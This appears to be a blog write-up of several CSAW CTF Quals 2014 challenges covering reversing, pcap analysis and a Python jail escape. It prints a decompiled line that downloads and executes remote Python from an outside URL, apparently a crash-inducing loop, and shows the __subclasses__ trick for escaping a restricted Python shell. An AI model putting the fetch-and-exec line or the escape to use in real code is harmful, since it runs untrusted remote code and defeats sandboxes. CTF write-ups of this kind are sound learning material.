CSAW CTF Quals 2014

Reversing 100

A zip archive was given eggshell-master.zip
I tried to run some of the python files included in it. But it crashed my machine.
Then I found a file named utils.pyc and I decompiled it using uncompile2.

/usr/local/bin/uncompyle2 utils.pyc                                                                                                            
# 2014.09.22 12:44:53 IST
#Embedded file name: /Users/kchung/Desktop/CSAW Quals 2014/rev100/utils.py
exec __import__('urllib2').urlopen('http://kchung.co/lol.py').read()
+++ okay decompyling utils.pyc 
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2014.09.22 12:44:53 IST

I opened http://kchung.co/lol.py link which displayed the following code:

import os
while True:
# flag{trust_is_risky}

Reversing 200

A windows PE32 executable was given. Which was more or less a similar challenge to last year’s quals.

I ran the program and found that it prints an encrypted flag. I immediately loaded it in IDA with debugger and found that the program exits upon the detecting a debugger and an decryption function is called just before that. Kindly follow what is mentioned in this image to get the decrypted flag
Reversing 200


Networking 100

A pcap file was given:
Hint given was misleading. But I knew that flag would be transferred through a tcp connection as a plain text according to the point given for this challenge. I created a dump of the tcp connections as tcp.pcap. I used a tool called tcpflow which breaks down each and every tcp connection and stores its content in ASCII file.

tcpflow -r tcp.pcap

These are the various files created after running the above commmand. alerts.txt report.xml tcp.pcap

Then I ran `strings` to check for any flag in plain text. And fortunately
I found the flag in plain text.

strings * | grep "flag"


Exploitation 100

An ELF 32 binary file was given
I ran a strings command on it and flag was hard coded in it


Exploitation 200

A python file was given.

In this problem all the functions except print and raw_input
are removed from the python shell which is given to us.

This is similar to python jail break challenge in plaidCTF 2013.
After a few google search I came to know that in Python, a type object has a __bases__ attribute which returns the list of all its base classes. It also has a __subclasses__ method that returns the list of all types that inherit from it. If we use __bases__ on a random
type, we can reach the top of the type hierarchy (object type), then read the subclasses of object to get a list of all types defined in the interpreter


40th index points to file function

In [10]: ().__class__.__bases__[0].__subclasses__()[40]
Out[10]: file

And the exploit is here:


solution for more challenges would be added very soon.


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s